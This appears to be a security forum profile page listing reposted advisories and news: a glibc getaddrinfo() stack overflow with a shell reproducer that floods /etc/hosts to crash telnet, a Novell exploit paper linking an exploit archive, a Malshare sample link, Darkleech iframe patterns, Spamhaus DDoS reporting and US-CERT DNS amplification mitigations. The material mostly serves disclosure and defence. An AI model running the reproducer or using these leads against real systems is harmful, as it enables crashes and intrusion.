Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. [h=1]CVE-2012-1889: Security Update Analysis[/h] Publicat la 19.07.2012 CVE-2012-1889: Security Update Analysis by Brian Mariani & Frederic Bourla Since the 30th of May 2012 hackers were abusing the Microsoft XML core services vulnerability. The 10th of July 2012 Microsoft finally published a security advisory which fixes this issue. The present document and video explains the details about this fix. As a lab test we used a Windows XP workstation with Service Pack 3. The Internet explorer version is 6.0. Demo video for publication: https://www.htbridge.com/publications... [h=4][/h]
  2. [h=1]Novell GroupWise Untrusted Pointer Dereference Exploitation[/h]April 3, 2013 [TABLE] [TR] [TD]Authors: [/TD] [TD]Brian Mariani, Senior Security Auditor, High-Tech Bridge Frederic Bourla, Chief Security Specialist, High-Tech Bridge[/TD] [/TR] [/TABLE] On the 24th of November 2012 High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Novell GroupWise 2012. On the 26th November 2012, High-Tech Bridge Security Research Lab informed Novell about these vulnerabilities, which existed in two core ActiveX modules. On the 30th of January 2013, Novell published Security Bulletin and released a security patch. Finally, on the 3rd of April 2013 High-Tech Bridge Security Research Lab disclosed advisory details. This paper demonstrates vulnerability exploitation to execute arbitrary code on the vulnerable system. PDF: Novell GroupeWise Untrusted Pointer Dereference (1,0 MB) Video: Novell GroupWise Untrusted Pointer Dereference Exploitation Exploit files (Novell-GroupWise-exploit.rar) password: htbridge (5 kB) Sursa: https://www.htbridge.com/publications/novell_groupwise_untrusted_pointer_dereference_exploitation.html
  3. Keep Your Eye On The Bitcoin 10:25 am (UTC-7) | by Ben April (Senior Threat Researcher) The market capitalization of the Bitcoin ecosystem crossed 1 billion US dollars recently. As the value of the each Bitcoin nears 100 US dollars, many have begun to take notice. One likely source of this sudden interest is the Cypriot banking crisis. As depositors scramble to hedge their investments, the steadily growing notoriety of bitcoin raises some interesting opportunities. The two most alluring aspects that make the Bitcoin economy unique are the concept of mining and, interestingly enough, the automatic limits on mining. Unlike other forms of currency, bitcoin users can create new money. By solving complex math problems users, or miners as they are often called, create new bitcoins where there used to be none. This operation is not strictly free “as in beer”. Miners need to invest time, electricity, and equipment into the endeavor. Profit is also not guaranteed. The nature of the math problems being solved mean that a single miner may never create new bitcoins on their own. This self-limiting aspect of Bitcoin creates a fascinating set of contradictions. First there is a hard limit. There will never be more than 21 million bitcoins in circulation. It is important to note that each Bitcoin can be divided almost ad-infinitum. Some software only supports fractional bitcoins to 8 decimal places, but there is no hard limit in the Bitcoin system itself. Once all bitcoins have been mined it is expected that the value will increase as smaller and smaller fractions are transacted. Block mining serves two functions. First, it cements a set of bitcoins transactions into the distributed record called the block chain. Second the miner who solves the problem and successfully signs the block is rewarded. The reward today consists of 25 bitcoins plus any transaction fees. Transaction fees are small quantities of bitcoins left over (intentionally by the requestor) from any submitted transactions. The reward changed from 50 bitcoins to 25 towards the end of November 2012. Bitcoin is designed such that this halving of the reward should automatically occur approximately ever 4 years, until 21 Million bitcoins have been created and the reward becomes 0. At this time, the transaction fee will become the only incentive for continued mining operations which are essential for the continued success of Bitcoin. Its distributed, non-regulated nature has also raised the ire of regulators. The United States Treasury Department’s Financial Crimes Enforcement Network announced on March 13 new guidelines on how to apply existing regulations to people involved in the transacting of virtual currencies. This announcement was aimed at the prevention of money laundering via Bitcoin; at the same time some saw it as adding legitimacy to the growing Bitcoin economy. One last attribute of Bitcoin that I will mention in this post is called “difficulty”. This is actually adjusted based on the overall speed of mining. If blocks are being mined at a rate faster than expected (due to an excess of mining capacity) the difficulty level increases automatically. This is intended to prevent one actor from applying excessive capacity in hopes of gaining an unfair advantage. Judging by the current up-swing of difficulty, I think it is safe to say that the popularity of Bitcoin is on the rise. No one can say for sure what is on the horizon for Bitcoin. However I think it is safe to say there will be more to see soon. Sursa: Keep Your Eye On The Bitcoin | Security Intelligence Blog | Trend Micro
  4. Nytro

    Malshare

    Va dati seama din titlu: http://malshare.com/daily/
  5. glibc getaddrinfo() stack overflow From: Marcus Meissner <meissner () suse de> Date: Wed, 3 Apr 2013 13:10:21 +0200 Hi, A customer reported a glibc crash, which turned out to be a stack overflow in getaddrinfo(). getaddrinfo() uses: struct sort_result results[nresults]; with nresults controlled by the nameservice chain (DNS or /etc/hosts). This will be visible mostly on threaded applications with smaller stacksizes, or operating near out of stack. Reproducer I tried: $ for i in `seq 1 10000000`; do echo "ff00::$i a1" >>/etc/hosts; done $ ulimit -s 1024 $ telnet a1 Segmentation fault (clean out /etc/hosts again ) I am not sure you can usually push this amount of addresses via DNS for all setups. Andreas is currently pushing the patch to glibc GIT. Reference: https://bugzilla.novell.com/show_bug.cgi?id=813121 Ciao, Marcus Sursa: oss-sec: CVE Request: glibc getaddrinfo() stack overflow
  6. [h=1]Ongoing malware attack targeting Apache hijacks 20,000 sites[/h][h=2]Mysterious "Darkleech" exposes visitors to potent malware exploits.[/h] by Dan Goodin - Apr 2 2013, 6:15pm GTBD Tens of thousands of websites, some operated by The Los Angeles Times, Seagate, and other reputable companies, have recently come under the spell of "Darkleech," a mysterious exploitation toolkit that exposes visitors to potent malware attacks. The ongoing attacks, estimated to have infected 20,000 websites in the past few weeks alone, are significant because of their success in targeting Apache, by far the Internet's most popular Web server software. Once it takes hold, Darkleech injects invisible code into webpages, which in turn surreptitiously opens a connection that exposes visitors to malicious third-party websites, researchers said. Although the attacks have been active since at least August, no one has been able to positively identify the weakness attackers are using to commandeer the Apache-based machines. Vulnerabilities in Plesk, Cpanel, or other software used to administer websites is one possibility, but researchers aren't ruling out the possibility of password cracking, social engineering, or attacks that exploit unknown bugs in frequently used applications and OSes. Researchers also don't know precisely how many sites have been infected by Darkleech. The server malware employs a sophisticated array of conditions to determine when to inject malicious links into the webpages shown to end users. Visitors using IP addresses belonging to security and hosting firms are passed over, as are people who have recently been attacked or who don't access the pages from specific search queries. The ability of Darkleech to inject unique links on the fly is also hindering research into the elusive infection toolkit. "Given that these are dynamically generated, there would be no viable means to do a search to ferret them out on Google, etc.," Mary Landesman a senior security researcher for Cisco Systems' TRAC team, told Ars. "Unfortunately, the nature of the compromise coupled with the sophisticated conditional criteria presents several challenges." The injected HTML iframe tag is usually constructed as IP address/hex/q.php. Sites that deliver such iframes that aren't visible within the HTML source are likely compromised by Darkleech. Special "regular expression" searches such as %7B32%7D%5C%2Fq.php&type=regexp&start=2013-02-27&end=2013-03-14&max=400"]this one helped Landesman ferret out reported iframes used in these attacks. Note that while the iframe reference is formed as IP/hex/q.php, the malware delivery is formed as IP/hex/hex/q.php. [h=2]In active development[/h] With the help of Cisco Security Engineer Gregg Conklin, Landesman observed Darkleech infections on almost 2,000 Web host servers during the month of February and the first two weeks of March. The servers were located in 48 countries, with the highest concentrations in the US, UK, and Germany. Assuming the typical webserver involved hosted an average of 10 sites, that leaves the possibility that 20,000 sites were infected over that period. The attacks were documented as early as August on researcher Denis Sinegubko's Unmask Parasites blog. They were observed infecting the LA Times website in February and the blog of hard drive manufacturer Seagate last month, an indication the attacks are ongoing. Landesman said the Seagate infection affected media.seagate.com, which was hosted by Media Temple, began no later than February 12, and was active through March 18. Representatives for both Seagate and the LA Times said the sites were disinfected once the compromises came to light. "I regularly receive e-mails and comments to my blog posts about new cases," Sinegubko told Ars last week. "Sometimes it's a shared server with hundreds or thousands of sites on it. Sometimes it's a dedicated server with some heavy-traffic site." Referring to the rogue Apache modules that are injected into infected sites, he added, "Since late 2012 people have sent me new versions of the malicious modules, so this malware is in active development, which means that it pays off well and the number of infected servers can be high (especially given the selectivity of the malware that prefers to stay under the radar rather than infecting every single visitor)." Landesman picked a random sample of 1,239 compromised websites and found all were running Apache version 2.2.22 or higher, mostly on a variety of Linux distributions. According to recent blog posts published here and here by researchers from security firm Securi, Darkleech uses rogue Apache modules to inject malicious payloads into the webpages of the sites it infects and to maintain control of compromised systems. Disinfecting Web servers can prove extremely difficult since the malware takes control of the secure shell (SSH) mechanism that legitimate administrators use to make technical changes and update content to a site. "We have noticed that they are modifying all SSH binaries and inserting a version that gives them full access back to the server," Securi CTO Daniel Cid wrote in January. "The modifications not only allow them to remote into the server bypassing existing authentication controls, but also allow them to steal all SSH authentications and push it to their remote servers." Researchers from a variety of other organizations, including antivirus provider Sophos and the Malware Must Die blog, have also stumbled on servers infected by Darkleech. They note the third-party attack sites host malicious code from the Blackhole exploit kit, a suite of tools that targets vulnerabilities in Oracle's Java, Adobe's Flash and Reader, and a variety of other popular client software. "It looks like the attackers were beforehand well-prepared with some penetration method to gain web exploitation which were used to gain shell access and did the privilege escalation unto root," the writer of the latter blog post wrote last week, adding that he wasn't at liberty to discuss the precise method. "Since the root [was] gained in all infected servers, there is no way we can trust the host or its credentials anymore." The writer went on to recommend that admins take infected servers offline and use backup data to reinstall the software. He also suggested that users take care to change all server credentials, since there's a strong chance all previous administrator logins have been compromised. [h=2]Déjà vu[/h] The Apache server compromise in many ways resembles a mass infection from 2008 that also used tens of thousands of sites to silently expose visitors to malware attacks. The challenge white hats often face in fighting these hacks is that each researcher sees only a small part of the overall damage. Because the server malware is designed to conceal itself and because so many individual systems are affected, it can be next to impossible for any one person to gain a true appreciation for the scope of attack. Since there's not yet consensus among researchers about exactly how Darkleech takes hold of infected systems, it's still unclear exactly how to protect them. And as already noted, disinfecting systems can also prove challenging since backdoor and possibly even rootkit functionality may allow attackers to maintain control of servers even after the malicious modules are uninstalled. Landesman has published her own blog post about the infection here. "This is a latent infection," Sinegubko wrote. "It hides from server and site admins using blacklists and IPs and low-level server APIs (something that normal site scripts don't have access to). "It hides from returning visitors. It constantly changes domains so you can't reduce it to the facts were some particular domain was involved. I'm still waiting for someone to share any reliable information about the attack vector." Sursa: http://arstechnica.com/security/2013/04/exclusive-ongoing-malware-attack-targeting-apache-hijacks-20000-sites/
  7. Pune pe pastebin parola cryptata si da-mi link te rog, am modificat eu primul post si parola nu mai e corecta.
  8. [h=1]When spammers go to war: Behind the Spamhaus DDoS[/h][h=2]The story behind the 300Gb/s attack on an anti-spam organization.[/h] by Peter Bright - Mar 28 2013, 7:30pm GTBS Over the last ten days, a series of massive denial-of-service attacks has been aimed at Spamhaus, a not-for-profit organization that describes its purpose as "track[ing] the Internet's spam operations and sources, to provide dependable realtime anti-spam protection for Internet networks." These attacks have grown so large—up to 300Gb/s—that the volume of traffic is threatening to bring down core Internet infrastructure. The New York Times reported recently that the attacks came from a Dutch hosting company called CyberBunker (also known as cb3rob), which owns and operates a real military bunker and which has been targeted in the past by Spamhaus. The spokesman who the NYT interviewed, Sven Olaf Kamphuis, has since posted on his Facebook page that CyberBunker is not orchestrating the attacks. Kamphuis also claimed that NYT was plumping for sensationalism over accuracy. Sven Olaf Kamphuis is, however, affiliated with the newly organized group "STOPhaus." STOPhaus claims that Spamhaus is "an offshore criminal network of tax circumventing self declared internet terrorists pretending to be 'spam' fighters" that is "attempt[ing] to control the internet through underhanded extortion tactics." STOPhaus claims to have the support of "half the Russian and Chinese Internet industry." It wants nothing less than to put Spamhaus out of action, and it looks like it's not too picky about how that might be accomplished. And if Spamhaus won’t back down, Kamphuis has made clear that even more data can be thrown at the anti-spammers. [h=2]Escalation[/h] Hating Spamhaus has a long history. Spamhaus is a nonprofit organization based in London and Geneva that was started in 1998 as a way of combating the escalating spam problem. The group doesn't block any data itself, but it does operate a number of blacklist services used by others to block data. The first of these was the Spamhaus Block List (SBL), a database of IP addresses known to be spam originators. E-mail servers can query the SBL for each incoming e-mail to see if the connection is being made from an IP address in the database. If it is, they can reject the connection as being a probable cause of spam. SBL tended to be filled with machines that were, for one reason or another, operating as open relays. The protocol used for sending e-mail, SMTP (Simple Mail Transfer Protocol) has a feature that nowadays might be considered rather undesirable: in principle, any SMTP server can be used to send e-mail from any sender to any recipient. If the SMTP server isn't responsible for the message box that a mail is being sent to, it should look up the server that is responsible for the message box and forward the message on to that server, a process called "relaying," and servers that operate in this way are “open” relays. This is great for spammers. They can use a bogus address for the sender and the victim's address for the recipient, then use any open relay to actually send that message. The open relay will then find the real recipient server and forward the message. This is obviously undesirable, so most SMTP servers these days apply additional rules. For example, ISP-operated mail servers will often operate as relays, but with some restrictions: they'll only allow relaying if the connection is being made from an IP address that belongs to the ISP. Or they will require a username and password to access. As awareness of the problem of open relays has grown and the number of useful open relays has dropped, spammers have moved to other approaches. Instead of sending mail through a relay, they more commonly send it from machines they control directly to the recipient's mail server. One way they do this is with compromised PCs organized in botnets. The command and control servers direct the PCs in the botnets to send spam, and so the spam originates from hundreds of thousands or millions of compromised home and office PCs. This is why the destruction of large botnets often results in a drop in the number of spam messages sent. To counter this kind of thing, some blacklist operators operate blacklists of "client" IP addresses, addresses used by consumer-focused ISPs that, for the most part, shouldn't be directly sending mail at all (instead, they should be routing mail through their ISPs' respective mail relays). Spamhaus operates such a list, separate from the SBL, calling it the Policy Block List. Spamhaus also has a database of compromised machines, the Exploits Block List, that lists hijacked machines running spam-related malware. Spamhaus has a number of criteria that can result in an IP address being listed in its database. The organization has a number of Spamtrap e-mail addresses; addresses which won't ever receive legitimate mail (because nobody actually uses them). This is the most obvious source of IP addresses, and probably the least controversial—if an IP address sends spam to an inbox, it's fair game to regard that IP address as a spam source. Spamhaus also blocks "spam operations," which is to say companies it believes make a business of sending spam. It lists these in its Register of Known Spam Operations (ROKSO), and it will pre-emptively blacklist IP addresses used by these groups. (Spamhaus will blacklist "spam support services"—ISPs and other service operators known to be spam friendly, for example by offering Web hosting to spammers, hosting spam servers, or selling spam software.) The organization's most severe measure is its DROP ("don't route or peer") list. The DROP list is a list of IP address blocks that are controlled by criminals and spammers. Routers can use these to block all traffic from these IP ranges. Rather than using DNS, this list is distributed as a text file, for manual configuration, and using the BGP protocol, for routers to use directly. In addition to the lists it maintains and the different inclusion criteria, Spamhaus has one particularly important policy: escalation. Repeated infringement—such as an ISP that refuses to terminate the service of spammers on its network—will see Spamhaus move beyond blacklisting individual IP addresses and start blacklisting ranges. If behavior still isn't improved, Spamhaus will block ever-larger ranges. All of these policies, predictably, have caused conflict. [h=2]Going to war[/h] Though Spamhaus does no blocking itself, groups that depend on spam tend to blame the company for their losses. This has resulted in court proceedings against the organization. In the US, now-defunct online marketing site e360insight sued Spamhaus after it was included on the ROKSO list, claiming that it had lost millions of dollars as a result of Spamhaus's decision. Being a UK-based company, Spamhaus initially ignored the lawsuit in the US, resulting in a default judgment against it, in which e360 was awarded almost $12 million in 2007. After US courts threatened to have Spamhaus's domain name suspended, the group decided at this point to get involved in the court case. Though the default judgment stood—if you don't show up at a civil case that's the risk you run—the $12 million judgment was overturned by the Seventh Circuit Court of Appeals. The case was bounced back to a lower court to decide on a new damages award. The second time around, the court decided on damages of $27,002. Both sides appealed again. In 2011 the Seventh Circuit Court of Appeals issued its second judgment on the issue. e360 was awarded damages of $3 after the court decided that e360 had failed to demonstrate the material impact of Spamhaus's decision and had instead wasted time and called a witness that "painted a wildly unrealistic picture" of e360s's losses. To add insult to injury, the court ordered e360 to pay Spamhaus's costs. In every practical sense, this was a victory for Spamhaus and a loss for e360, though it didn't much matter by this point; e360 went out of business in 2008 or 2009 after engaging in numerous lawsuits against Internet users who had called it a spammer, and against Comcast for blocking e360's spam. It lost all these cases. Obviously, those who make money from spamming will have a grievance with Spamhaus. But they're not the only ones, thanks in no small part to Spamhaus' escalation policy. Network providers and domain registries also fall foul of its policies from time to time. In 2007, for instance, Spamhaus asked Austrian domain registry nic.at to suspend some domains, claiming that they were registered improperly and were being used to host phishing sites. Nic.at refused, saying that it would be against Austrian law to do so. The registrar asked Spamhaus to show that the registration information on the sites was incorrect. Spamhaus responded by putting nic.at's mail server in its blacklist under the "spam support services" category, arguing that nic.at let spammers keep using their domains. Ultimately, the domains were removed and nic.at was delisted. These kinds of conflicts eventually led to a fight between Spamhaus and CyberBunker. Spamhaus regards CyberBunker—which has a policy of hosting any kind of content so long as it is not "child porn and anything related to terrorism"—as a spam support service. Spamhaus says that CyberBunker was at one point hosting Chinese sites selling spamvertised knock-off watches. CyberBunker says that this has never been proven, and it dismissed the complaints as "childish claims." Spamhaus went upstream. CyberBunker bought its bandwidth from a company called DataHouse, which in turn bought bandwidth from Dutch service provider A2B Internet. In June 2011, Spamhaus asked A2B to cut off CyberBunker's network. A2B didn't, so in October 2011, Spamhaus added a range of 2,048 A2B-owned addresses to its blacklist. E-mail correspondence between Spamhaus and A2B, published by A2B, eventually acknowledged that CyberBunker/cb3rob was hosting a spamvertised site. Shortly after this acknowledgement was made, A2B ceased routing for CyberBunker; five hours later Spamhaus removed A2B from the blacklist. A2B subsequently filed a police complaint against Spamhaus, claiming that the group was engaged in "extortion" and was conducting "denial of e-mail service" attacks. [h=2]Stopping Spamhaus?[/h] The collective opposition to Spamhaus has now produced STOPhaus. This is not the first group organizing to stop Spamhaus, and it comes after previous efforts such as stopspamhaus.org. The group dismisses Spamhaus' claim to only operate lists and perform no blocking itself as false and misleading to the public, and it claims that Spamhaus "violates multiple terrorism laws." STOPhaus members consistently describe Spamhaus' activity as "blackmail" and further argue that the information listed in ROKSO is "slander" [sic] and in violation of the UK's Data Protection Act. They also says that if Spamhaus detects criminal activity, it has the "legal obligation" to report this to law enforcement rather than to list offending IP addresses and domains in its databases. Finally, they claim that the DROP list is a violation of the "UK Computer Sabotage Act" (though no such act exists in the UK). The style of the STOPhaus announcement is more than a little familiar to anyone who has followed Anonymous' various Internet activities. It mirrors the verbiage and slogans that have been a common feature of past Anonymous announcements. The Anonymous similarities don't stop there. The STOPhaus forum contains preliminary attempts to dox people associated with Spamhaus and with anti-spam activities in general. (This includes Usenet group news.admin.net-abuse.email, where spam has been discussed since 1995, and Rob Pike, creator of the Plan 9 operating system and Google's Go programming language.) Besides claiming that Spamhaus is broadly criminal, STOPhaus asserts that Spamhaus threatens “net neutrality”; Spamhaus has such power that it can functionally deny people access to the Internet simply by listing them in its database. Despite all this alleged blocking, STOPhaus says that Spamhaus doesn't do one key thing: block spam. Not a single piece of it, apparently, not even as an accidental repercussion of the escalation policy. On March 19 of this year, STOPhaus supporters announced "Operation STOPhaus," demanding that Spamhaus cease listing any IP addresses other than those known to send spam to its own spamtraps, and that it compensate everyone whose non-spamming IP address was ever listed. Unsurprisingly, Spamhaus did not bow to the STOPhaus demands but instead complained to STOPhaus.com's hosting company, saying that the site was operated by a known spammer. Spamhaus was then attacked with a DDoS attack of apparently unprecedented scale. Kamphuis says that, although he is not personally conducting the attacks, the people who are could throw "quite a bit more" data at the anti-spam organization if needed. While this may disrupt the Internet for others, Kamphuis says that his group probably owns a third of the Internet, and as such they're "perfectly free" to break it if they want. If what Kamphuis says is true, Spamhaus can only expect the DDoS attacks to grow larger. [h=2]No end in sight[/h] Assuming that the attack really is being made to the large Russian and Chinese Internet companies that Kamphuis says are involved, there's no particular reason for it to end any time soon. In some ways similar to the open SMTP relays of the past, two pieces of poor configuration are facilitating the attacks. Unlike open SMTP relays, these poor configurations are unlikely to go away any time soon. The specific issues are ISPs that allow forged traffic to leave their networks—something which has little good justification to permit—and open DNS servers that can be used to generate large responses in response to forged IP traffic. Together, these allow attack systems that begin with a few gigabits of bandwidth to generate enormous floods of data through “amplification attacks” capable of knocking any conventionally hosted server off the 'Net. Even if a concerted effort were made to fix these systems, it would probably take months, if not years, to make a serious dent in the problem. As long as Spamhaus, its DDoS protection provider CloudFlare, and their respective connectivity providers are willing to tolerate the situation, they too don't really need to change anything. The Spamhaus blacklist is widely used, and it's widely used for one reason: contrary to STOPhaus's claims, it does, in fact, successfully block a lot of unwanted e-mail. There might be occasional collateral damage, but Spamhaus' users are clear: they're willing to take that risk if the alternative is more spam. Sursa: http://arstechnica.com/security/2013/03/when-spammers-go-to-war-behind-the-spamhaus-ddos/
  9. Alert TA13-088A: DNS Amplification Attacks From: US-CERT Alerts <technical-alerts () us-cert gov> Date: Fri, 29 Mar 2013 16:16:20 -0400 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Awareness System TA13-088A: DNS Amplification Attacks Original release date: March 29, 2013 Systems Affected * Domain Name System (DNS) servers Overview A Domain Name Server (DNS) Amplification attack is a popular form of Distributed Denial of Service (DDoS) that relies on the use of publically accessible open recursive DNS servers to overwhelm a victim system with DNS response traffic. Description A Domain Name Server (DNS) Amplification attack is a popular form of Distributed Denial of Service (DDoS) that relies on the use of publically accessible open recursive DNS servers to overwhelm a victim system with DNS response traffic. The basic attack technique consists of an attacker sending a DNS name lookup request to an open recursive DNS server with the source address spoofed to be the victims address. When the DNS server sends the DNS record response, it is sent instead to the victim. Because the size of the response is typically considerably larger than the request, the attacker is able to amplify the volume of traffic directed at the victim. By leveraging a botnet to perform additional spoofed DNS queries, an attacker can produce an overwhelming amount of traffic with little effort. Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks. While the attacks are difficult to prevent, network operators can implement several possible mitigation strategies. The primary element in the attack that is the focus of an effective long-term solution is the detection and elimination of open recursive DNS resolvers. These systems are typically legitimate DNS servers that have been improperly configured to respond to recursive queries on behalf of any system, rather than restricting recursive responses only to requests from local or authorized clients. By identifying these systems, an organization or network operator can reduce the number of potential resources that the attacker can employ in an attack. Impact A misconfigured Domain Name System (DNS) server can be exploited to participate in a Distributed Denial of Service (DDoS) attack. Solution DETECTION Several organizations offer free, web-based scanning tools that will search a network for vulnerable open DNS resolvers. These tools will scan entire network ranges and list the address of any identified open resolvers. Open DNS Resolver Project http://openresolverproject.org The Open DNS Resolver Project has compiled a list of DNS servers that are known to serve as globally accessible open resolvers. The query interface allows network administrators to enter IP ranges in CIDR format [1]. The Measurement Factory http://dns.measurement-factory.com Like the Open DNS Resolver Project, the Measurement Factory maintains a list of Internet accessible DNS servers and allows administrators to search for open recursive resolvers [2]. In addition, the Measurement Factory offers a free tool to directly test an individual DNS resolver to determine if it allows open recursion. This will allow an administrator to determine if configuration changes are necessary and verify that configuration changes have been effective [3]. Finally, the site offers statistics showing the number of open resolvers detected on the various Autonomous System (AS) networks, sorted by the highest number found [4]. DNSInspect http://www.dnsinspect.com Another freely available, web-based tool for testing DNS resolvers is DNSInspect. This site is similar to The Measurement Factorys ability to test a specific resolver for vulnerability, but offers the ability to test an entire DNS Zone for several other potential configuration and security issues [5]. Indicators In a typical recursive DNS query, a client sends a query request to a local DNS server requesting the resolution of a name or the reverse resolution of an IP address. The DNS server performs the necessary queries on behalf of the client and returns a response packet with the requested information or an error [6, page 21]. The specification does not allow for unsolicited responses. In a DNS amplification attack, the key indicator is a query response without a matching request. MITIGATION Unfortunately, due to the overwhelming traffic volume that can be produced by one of these attacks, there is often little that the victim can do to counter a large-scale DNS amplification-based distributed denial-of-service attack. While the only effective means of eliminating this type of attack is to eliminate open recursive resolvers, this requires a large-scale effort by numerous parties. According to the Open DNS Resolver Project, of the 27 million known DNS resolvers on the Internet, approximately 25 million pose a significant threat of being used in an attack [1]. However, several possible techniques are available to reduce the overall effectiveness of such attacks to the Internet community as a whole. Where possible, configuration links have been provided to assist administrators with making the recommended changes. The configuration information has been limited to BIND9 and Microsofts DNS Server, which are two widely deployed DNS servers. If you are running a different DNS server, please see your vendors documentation for configuration details. Source IP Verification Because the DNS queries being sent by the attacker-controlled clients must have a source address spoofed to appear as the victims system, the first step to reducing the effectiveness of DNS amplification is for Internet Service Providers to deny any DNS traffic with spoofed addresses. The Network Working Group of the Internet Engineering Task Force released a Best Current Practice document in May 2000 that describes how an Internet Service Provider can filter network traffic on their network to drop packets with source addresses not reachable via the actual packets path [7]. This configuration change would considerably reduce the potential for most current types of DDoS attacks. Disabling Recursion on Authoritative Name Servers Many of the DNS servers currently deployed on the Internet are exclusively intended to provide name resolution for a single domain. These systems do not need to support resolution of other domains on behalf of a client, and therefore should be configured with recursion disabled. Bind9 Add the following to the global options [8]: options { allow-query-cache { none; }; recursion no; }; Microsoft DNS Server In the Microsoft DNS console tool [9]: * Right-click the DNS server and click Properties. * Click the Advanced tab. * In Server options, select the Disable recursion check box, and then click OK. Limiting Recursion to Authorized Clients For DNS servers that are deployed within an organization or ISP to support name queries on behalf of a client, the resolver should be configured to only allow queries on behalf of authorized clients. These requests should typically only come from clients within the organizations network address range. BIND9 In the global options, add the following [10]: acl corpnets { 192.168.1.0/24; 192.168.2.0/24; }; options { allow-query { corpnets; }; allow-recursion { corpnets; }; }; Microsoft DNS Server It is not currently possible to restrict recursive DNS requests to a specific client address range in Microsoft DNS Server. The most effective means of approximating this functionality is to configure the internal DNS server to forward queries to an external DNS server and restrict DNS traffic in the firewall to restrict port 53 UDP traffic to the internal server and the external forwarder [11]. Rate Limiting Response of Recursive Name Servers There is currently an experimental feature available as a set of patches for BIND9 that allows an administrator to restrict the number of responses per second being sent from the name server [12]. This is intended to reduce the effectiveness of DNS amplification attacks by reducing the volume of traffic coming from any single resolver. BIND9 On BIND9 implementation running the RRL patches, add the following lines to the options block of the authoritative views [13]: rate-limit { responses-per-second 5; window 5; }; Microsoft DNS Server This option is currently not available for Microsoft DNS Server. References * [1] Open DNS Resolver Project * [2] The Measurement Factory, "List Open Resolvers on Your Network" * [3] The Measurement Factory, "Open Resolver Test" * [4] The Measurement Factory, "Open Resolvers for Each Autonomous System" * [5] "DNSInspect," DNSInspect.com * [6] RFC 1034: DOMAIN NAMES - CONCEPTS AND FACILITIES * [7] BCP 38: Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing * [8] Chapter 3. Name Server Configuration * [9] Disable recursion on the DNS server * [10] Chapter 7. BIND 9 Security Considerations * [11] Configure a DNS Server to Use Forwarders * [12] DNS Response Rate Limiting (DNS RRL) * [13] Response Rate Limiting in the Domain Name System (DNS RRL) Revision History * March 29, 2013: Initial release Relevant URL(s): <http://openresolverproject.org/> <http://dns.measurement-factory.com/cgi-bin/openresolverquery.pl> <http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl> <http://dns.measurement-factory.com/surveys/openresolvers/ASN-reports/latest.html> <http://www.dnsinspect.com/> <http://tools.ietf.org/html/rfc1034> <http://tools.ietf.org/html/bcp38> <http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch03.html#id2567992> <http://technet.microsoft.com/en-us/library/cc787602.aspx> <http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch07.html#Access_Control_Lists> <http://technet.microsoft.com/en-us/library/cc754941.aspx> <http://ss.vix.su/~vixie/isc-tn-2012-1.txt> <http://www.redbarn.org/dns/ratelimits> ____________________________________________________________________ Produced by US-CERT, a government organization. ____________________________________________________________________ This product is provided subject to this Notification: http://www.us-cert.gov/privacy/notification/ Privacy & Use policy: http://www.us-cert.gov/privacy/ This document can also be found at http://www.us-cert.gov/ncas/alerts/TA13-088A For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/mailing-lists-and-feeds/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBUVXuq3dnhE8Qi3ZhAQIBXAf+LICtxQHGu5j7x8NAFG+tTSWrjducZ37v oWhQuSsXp9XjwAN1RdXOZRpX2Sbp5b1bVZ+FfjdPljoRVpoRksuBu5qOfzathZEP 3aRA7O0Kffuk2ofCsn8I9nWOas7bZa9gO8hGan4ORjEJLt4OWFtPW+2aWfDKY72x lcky1Ms6Z1TGkCTgJLuoUXXmGg8JQJqvRfkc7VAY4ttpJV1/DtpMIZyf2Hbr4inp ClnGYi64ukzu38kYkQ33u3oPKjYX8bwWKAZRnpQAcHO8ddswKre7Cz2Ar5tTNluY 0/nzEAx6BVAKgntp5NUJ8y55ej+RyEQiCpBAkhE8xImmxAUPJ7AiMw== =FVTl -----END PGP SIGNATURE----- Sursa: CERT: Alert TA13-088A: DNS Amplification Attacks
  10. [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: justify]Salted Hash Generator is the FREE all-in-one tool to generate salted hash for popular hash types including MD5 and SHA1 family. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 100%] [TR] [TD=align: justify] Here are the currently supported hash types, LM NTLM MD5 Family (MD2, MD4, MD5) SHA1 Family (SHA1, SHA256, SHA384, SHA512) RIPEMD160 For each type, it generates hash for various combination of Password & Salt as follows, Password only Password+Salt Salt+Password Finally, you can save the generated hash list to HTML/XML/TEXT file. It is fully portable and works on all platforms starting from Windows XP to Windows 8. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Features [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Generate Salted Hashes for popular algorithms including MD5, SHA256, LM, NTLM. Create Hash for all combination of password & salt Directly copy the selected hash from the list by right click menu option. Save the generated hash list to HTML/TEXT/XML file Simple, Easy to Use GUI Interface Installer for local installation & un-installation Fully Portable Tool, can be run anywhere [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD]Screenshot 1:SaltedHashGenerator is generating hashes for various password & salt combinations[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]Screenshot 2: HTML report of generated hash list.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] Download: http://securityxploded.com/download.php#saltedhashgenerator Sursa: Salted Hash Generator : All-in-one Tool to Generate Salted Hash for MD5/SHA1/SHA256/SHA512/LM/NTLM | www.SecurityXploded.com
